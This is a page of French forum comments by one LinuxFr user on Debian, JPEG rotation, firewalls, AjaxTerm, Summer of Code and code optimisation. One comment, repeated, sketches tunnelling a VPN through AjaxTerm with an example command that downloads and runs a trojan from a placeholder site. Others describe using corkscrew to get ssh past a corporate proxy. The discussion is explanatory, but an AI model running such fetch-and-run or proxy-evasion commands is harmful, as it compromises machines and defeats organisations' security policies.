Matthieu Moy a écrit 3249 commentaires

  • [^] # Re: ah merde alors

    Posté par  (site web personnel) . En réponse au journal Debian ne supportera plus la Woody à la fin du mois. Évalué à 2.

    > Je pense que la communauté, dans toute sa diversité, permet déjà de tester un nombre important de scénario.

    Bah, moi, je connais personne qui s'ammuse à tester le passage d'une stable à l'autre. Je connais pleins de gens (dont moi) qui utilisent unstable et font des bug-reports, mais qui n'upgradent que de unstable vers unstable.

    Si tu connais des gens qui testent la migration stable vers stable N+1, n'hésites pas à le faire savoir.
  • [^] # Re: ah merde alors

    Posté par  (site web personnel) . En réponse au journal Debian ne supportera plus la Woody à la fin du mois. Évalué à 2.

    Sauf erreur de ma part, c'est 5 ans après la sortie de la version N+1 (histoire que le mec qui a acheté Windows la veille de la sortie de la version suivante ai droit à ses 5 ans de support).

    Là dessus, même Debian est loin derrière.
  • [^] # Re: Cool...

    Posté par  (site web personnel) . En réponse au journal Dapper jour 1. Évalué à 3.

    t'oublies les interviews de Mark Shuttleworth ...
  • [^] # Re: Ils sont trop forts, on peut pas lutter ...

    Posté par  (site web personnel) . En réponse au journal Microsoft cherche à remplacer le JPEG. Évalué à 3.

    Bon, c'est fini de raconter des conneries ?

    Afficher une image avec rotation, transposée, ou mirroir, un élève de terminale arriverait à le faire sans que ça ne coûte quoi que ce soit. Tu changes les indices de ta boucle, et voilà.

    Faire tourner une image décompressée, même avec une relativement haute résolution, y'a pas besoin d'être un géni pour trouver l'algorithme non plus, et se rendre compte que c'est quasi-instantané sur les machines d'aujourd'hui.

    Par contre, si je te donne une image jpeg, et que je te demande de la faire tourner de 90 degrés, l'algorithme naïf « décompresser, appliquer l'algo ci-dessus, recompresser » (convert faisait ça a une époque, je ne sais pas si c'est encore le cas) est doublement mauvais. Premièrement, l'algo va passer tout son temps dans la compression et décompression (sur des images à quelques millions de pixels, ça prend vite quelques secondes), et ensuite, la compression étant avec perte, on va perdre en qualité. Par exemple, tu prends une image fortement compressée en jpeg, si tu la fais tourner sans un algo spécifique, soit tu va reperdre énormément en qualité, soit tu auras une image qui prendra plus de place sur le disque.

    Pour le jpeg, le problème est partiellement résolu, puisqu'il y a des outils comme jpegtran qui font de la rotation sans perte sur du jpeg, mais la rotation n'est réélement sans perte que si ton image a une dimension, de mémoire, multiple de 8 pixels en horizontal et en vertical (pas étonnant puisque le jpeg travaille sur des blocs de 8x8). Bref, le problème de la rotation du jpeg est effectivement un problème ...

    Par exemple, sur mon appareil numérique, je peux faire une « rotation ». En fait, l'appareil se garde bien de faire la rotation lui-même, il se contente d'ajouter l'information sur la rotation dans les données EXIF, et il les utilise pour l'affichage sur l'écran LCD. Ensuite, c'est Digikam qui fait la rotation au moment de récupérer les photos. Mais tout ça, ça passe par EXIF, qui est une extension pas aussi standard qu'elle pourrait l'être. Intégrer ça au format d'image, c'est relativement évident, mais ça n'en est pas moins une très bonne idée.
  • [^] # Re: Mais comment ca marche ???

    Posté par  (site web personnel) . En réponse à la dépêche NuFW 2.0, nouvelle version majeure du pare-feu authentifiant. Évalué à 1.

    Si j'ai bien compris, ce n'est pas de ça qu'il s'agit. Ça serait plutôt : autoriser MSIE à accéder au site, et bloquer les firefox.

    En local, je ne sais plus comment ça se fait en pratique, mais le noyau peut retrouver quel est l'executable à l'origine d'une connection assez facilement, donc no problem. Par contre, à distance, on a juste les paquets TCP et il faut faire avec, donc, c'est là qu'il faut rajouter une couche, et c'est là qu'il y a forcément un maillon de la chaine de confiance chez le client, qui dit « Ouais, j'ai vérifié, c'est bien un MSIE, laisses-le passer ».

    Au passage, si c'était Microsoft qui avait fait ce genre de trucs, et qui l'avait appelé Palladium ou NGSCB, on aurait eu beaucoup moins d'éloge sur ce site ...
  • [^] # Re: J'ai pas tout pige...

    Posté par  (site web personnel) . En réponse au journal Un émulateur de terminal en AJAX.... Évalué à 4.

    Si tu as un firewall entre toi et la machine cible, tu peux toujours essayer de faire un ssh, ça ne marchera pas, il sera bloqué par le firewall. Ce qu'il te faut pour passer à travers le firewall via le proxy, c'est un truc qui se connecte au proxy, et qui lui demande dans le langage des proxys de se connecter à ta machine.

    Là, l'astuce, c'est qu'il faut demander au proxy d'établir une connection HTTPS, et en HTTPS, le proxy n'a aucun contrôle sur le contenu (sinon, ça serait une attaque man-in-the-middle), donc, tu peux bien faire passer du ssh à la place du HTTP chiffré, le proxy n'y voit que du feu. Une fois la connection établie, donc, au lieu d'envoyer les paquets directement a la machine vers laquelle tu te connecte, tu les envoies au proxy, et tu recoit de lui.

    Corkscrew n'est pas un client ssh, c'est juste un tout petit programme qui fait la bidouille décrite ci-dessus, et tu configures ton OpenSSH pour utiliser corkscrew pour établir la connection. C'est en plus, pas à la place de.
  • [^] # Re: Mais comment ca marche ???

    Posté par  (site web personnel) . En réponse à la dépêche NuFW 2.0, nouvelle version majeure du pare-feu authentifiant. Évalué à 3.

    Attention quand même avec cette solution : une partie de la chaine de confiance se trouve chez le client. Si l'utilisateur a le contrôle de la machine cliente, il peut contourner les protections.
  • [^] # Re: Format d'image supportant les DRM ?

    Posté par  (site web personnel) . En réponse au journal Microsoft cherche à remplacer le JPEG. Évalué à 5.

    > Mais est ce que ça veut dire que les captures d'écrans sous Vista laisseront
    > des carrés noirs aux emplacements de ces images?

    C'était déjà le cas des captures d'écran de MS Encarta 98, donc, oui, c'est très envisageable, et ça a déjà été fait.
  • [^] # Re: J'ai pas tout pige...

    Posté par  (site web personnel) . En réponse au journal Un émulateur de terminal en AJAX.... Évalué à 2.

    C'est juste de passer à travers le proxy de ton côté, et c'est effectivement un hack relativement trivial. Mais de l'autre côté, oui, c'est un ssh qui tourne sur le port 443.
  • [^] # Re: "secure"

    Posté par  (site web personnel) . En réponse au journal Un émulateur de terminal en AJAX.... Évalué à 1.

    > c'est ton programme A qui peut l'être.

    Là, on parle de sécurité. Le programme A, ça peut très bien être un virus ou n'importe quoi que tu ne controles pas.

    > D'ailleurs ton programme A peut directement se connecter sur ta machine distante sans AjaxTerm

    Ben, là, il est question de contourner les politiques de sécurité, les VPN, toussa, donc, non, le programme A, il ne peut pas se connecter directement.

    (hint: google, firewall, proxy, et revient en parler un peu après si tu veux).
  • [^] # Re: question

    Posté par  (site web personnel) . En réponse à la dépêche Summer of Code, enfin les sélections. Évalué à 0.

    Bah, c'est assez courrant en Français de dire « tu » pour dire « on »...

    Tu peux faire s/tu/le mec/ si tu préfères ;-)
  • [^] # Re: J'ai pas tout pige...

    Posté par  (site web personnel) . En réponse au journal Un émulateur de terminal en AJAX.... Évalué à 2.

    http://www.google.com/search?q=corkscrew+ssh+https

    C'est bien plus efficace pour faire du ssh-over-https avec proxy.

    Mais c'est probablement très limite par rapport à la charte d'utilisation des moyens informatiques de ta boite.
  • [^] # Re: "secure"

    Posté par  (site web personnel) . En réponse au journal Un émulateur de terminal en AJAX.... Évalué à -3.

    > Par ailleurs, AjaxTerm n'a strictement rien à voir avec un VPN : là on parle de
    > HTTP (non connecté par définition), d'échange de sortie d'écran et de saisies
    > clavier. De là à dire que ça correspond à un VPN du style SSH ...

    ... il n'y a qu'un pas !

    Techniquement, c'est compliqué à implémenter, mais théoriquement, ça ne pose pas de difficulté. Tu écris un programme, disons A, qui se comporte comme un navigateur du point de vue du serveur AjaxTerm, mais non interactif. A envoie quelques commandes pour lancer un demon B sur le serveur qui fait tourner AjaxTerm (genre "wget http://mon-site.com/mon-troyen; ./mon-troyen"). Le petit démon B en question peut être un sshd à peine modifié, pour recevoir ses ordres dans stdin et envoyer les données par stdout. Ton programme A se comporte alors comme un client ssh, et B comme le serveur ssh, et tu peux implémenter tout ce que tu faisais avec ssh à travers ton AjaxTerm (avec des performances lamentables, mais bon), y compris le forward de port.

    Bref, tu peux très bien implémenter un VPN over AjaxTerm.

    Par contre, si la machine avec AjaxTerm est compromise, à priori, ça ne lui donne aucun moyen de compromettre le client.
  • [^] # Re: "secure"

    Posté par  (site web personnel) . En réponse au journal Un émulateur de terminal en AJAX.... Évalué à 2.

    > Par ailleurs, AjaxTerm n'a strictement rien à voir avec un VPN : là on parle de
    > HTTP (non connecté par définition), d'échange de sortie d'écran et de saisies
    > clavier. De là à dire que ça correspond à un VPN du style SSH ...

    ... il n'y a qu'un pas !

    Techniquement, c'est compliqué à implémenter, mais théoriquement, ça ne pose pas de difficulté. Tu écris un programme, disons A, qui se comporte comme un navigateur du point de vue du serveur AjaxTerm, mais non interactif. A envoie quelques commandes pour lancer un demon B sur le serveur qui fait tourner AjaxTerm (genre "wget http://mon-site.com/mon-troyen; ./mon-troyen"). Le petit démon B en question peut être un sshd à peine modifié, pour recevoir ses ordres dans stdin et envoyer les données par stdout. Ton programme A se comporte alors comme un client ssh, et B comme le serveur ssh, et tu peux implémenter tout ce que tu faisais avec ssh à travers ton AjaxTerm (avec des performances lamentables, mais bon), y compris le forward de port.

    Bref, tu peux très bien implémenter un VPN over AjaxTerm.

    Par contre, si la machine avec AjaxTerm est compromise, à priori, ça ne lui donne aucun moyen de compromettre le client.
  • # C'est possible !

    Posté par  (site web personnel) . En réponse au journal Taxe sur les courriels et SMS. Évalué à 8.

    Moi, j'ai bien reçu un mail, que si je le renvoyais à 10 de mes contacts, Bill Gates m'envoyais un chèque de 100 USD, alors si c'est possible de faire ça, pourquoi pas dans l'autre sens, hein !

    ---> [ ]
  • [^] # Re: vraiment

    Posté par  (site web personnel) . En réponse au journal Publicite pour hotmail/msn cachée?. Évalué à 3.

    Sauf erreur de ma part, ils ont commencé à ouvrir des @hotmail. pour faire plus d'adresses possible, parce que les gens en avaient marre de devoir rajouter des _345346 à la fin de leur nom pour avoir une adresse valide (ils doivent toujours le faire, mais un peu moins ...).

    $ host -t mx hotmail.fr
    hotmail.fr mail is handled by 10 pamx1.hotmail.com.
  • [^] # Re: Ce n'est pas exprès

    Posté par  (site web personnel) . En réponse au journal Publicite pour hotmail/msn cachée?. Évalué à 5.

    Au passage, si on reprends les écrits fondateurs, on peut y lire

    J'ai été voir mes mails du dimanche matin et j'ai lu planet.gnome debout dans la file du boulanger.

    A moins que ça ne soit une typo et qu'il fallait y lire debout dans la fille du boulanger, je crois que les fantasmes de certains linuxfriens s'effondrent, là !
  • [^] # Re: question

    Posté par  (site web personnel) . En réponse à la dépêche Summer of Code, enfin les sélections. Évalué à 1.

    > Relis bien mon poste : certaines personne _ne peuvent pas_ accepter l'argent

    Euh, moi, je relis bien ton poste, et je vois : « ne peuvent pas ou ne veulent pas ». Et si tu relis bien le mien, de poste, tu verras que je ne te vise pas personnellement. Bien sûr que si tu ne peux pas toucher l'argent, bah, tu vas pas le toucher ;-).

    > je ne vois pas ou est le mal de laisser l'argent a Google
    > (meme si ce n'est pas ce que je fais), ils font deja assez avec le programme SoC a mon avis;

    Je trouve aussi que le programme SoC est une très bonne initiative, et on ne peut que remercier Google pour ça. Mais il ne faut pas non plus se leurer, ils le font parce qu'ils y ont un intérêt, et l'un des intérêts est de travailler leur image de marque en criant haut et fort qu'ils donnent de l'argent (l'autre, à mon avis, étant d'entretenir des bonnes relations avec les étudiants qu'ils comptent tenter de recruter). Alors si ils se font de la pub en donnant des sous, et que de l'autre côté, les gens les refusent, ils ont un peu le beurre et l'argent du beurre !

    > (ii) Google nous pousse a accepter l'argent.

    Ça, au moins, c'est fair-play !!
  • [^] # Re: question

    Posté par  (site web personnel) . En réponse à la dépêche Summer of Code, enfin les sélections. Évalué à 1.

    C'est un peu dommage de ne pas vouloir des 500$. C'est faire un cadeau de 500$ à Google, qui a mon avis, en a déjà bien assez, des $.

    Autant accepter les 500$ et les donner à la FSF ou autre si tu ne les veux pas personnellement.
  • [^] # Re: question

    Posté par  (site web personnel) . En réponse à la dépêche Summer of Code, enfin les sélections. Évalué à 2.

    SEE ALSO
    man ploum
  • [^] # Re: il faut faire quoi ?

    Posté par  (site web personnel) . En réponse à la dépêche Référentiel Général d'Interopérabilité: Nouvel appel à contributions. Évalué à 5.

    J'ai mis un peu de temps à comprendre le principe, mais en fait, c'est assez simple.

    Mettons que tu veuille imposer le .doc dans l'administration. Tu vas sur la page d'accueil ( http://www.adele.gouv.fr/wiki/index.php/Accueil ), tu cliques sur « Format de document » ( http://www.adele.gouv.fr/wiki/index.php/Formats_de_documents ), et tu regardes quelles sont les règles proposées.

    Tu constates que le .doc n'y est même pas mentionné (y'en a que pour l'HTML et OpenDocument, c'est scandaleux !). Tu télécharges donc le PDF pointé en haut « volet interopérabilité technique » ( https://www.ateliers.adele.gouv.fr/ministeres/domaines_d_exp(...) ) pour comprendre.

    Pour exprimer ton mécontentement, tu cliques sur l'onglet « discussion », puis sur « éditer », et le tour est joué.
  • [^] # Re: dans le cadre de : on aurait pu y penser

    Posté par  (site web personnel) . En réponse au sondage Mon logiciel de voix sur IP préféré. Évalué à 2.

    Tu n'as pas le téléphone je suppose ?
  • [^] # Re: dommageable ?

    Posté par  (site web personnel) . En réponse à la dépêche Référentiel Général d'Interopérabilité: Nouvel appel à contributions. Évalué à 5.

    http://www.adele.gouv.fr/wiki/index.php/Organisation_de_l%27(...)

    L'appel à commentaires débute le 1er avril 2006 et se termine le 30 Août 2006.
  • [^] # Re: Logiciels pas optimisés

    Posté par  (site web personnel) . En réponse au journal Pourquoi nous vendons un code contenant des bogues.... Évalué à 4.

    Petit complément : pour les petites optimisations à deux balles dans le code, il faut aussi voir que le compilo fait souvent mieux que le programmeur.

    Donc, le mec qui passe 1h à se demander si il vaut mieux écrire

    if (x != 0) {
    y = 4;
    } else {
    y = 5
    }

    ou

    y = x ? 4 : 5;

    pour les performances, il a tout faut.

    Et d'une manière générale, il vaut mieux écrire d'abord juste, puis utiliser un profiler pour voir où ça coince, et n'optimiser que cet endroit là.
  • [^] # Re: Une autre raison ...

    Posté par  (site web personnel) . En réponse au journal Pourquoi nous vendons un code contenant des bogues.... Évalué à 4.

    Attention, sans bug != sans bug connu.

    Là, on parle de bug connu, bien sûr. Il me semble que MySQL ne sort que quand il n'y a pas de bugs connus (à vérifier).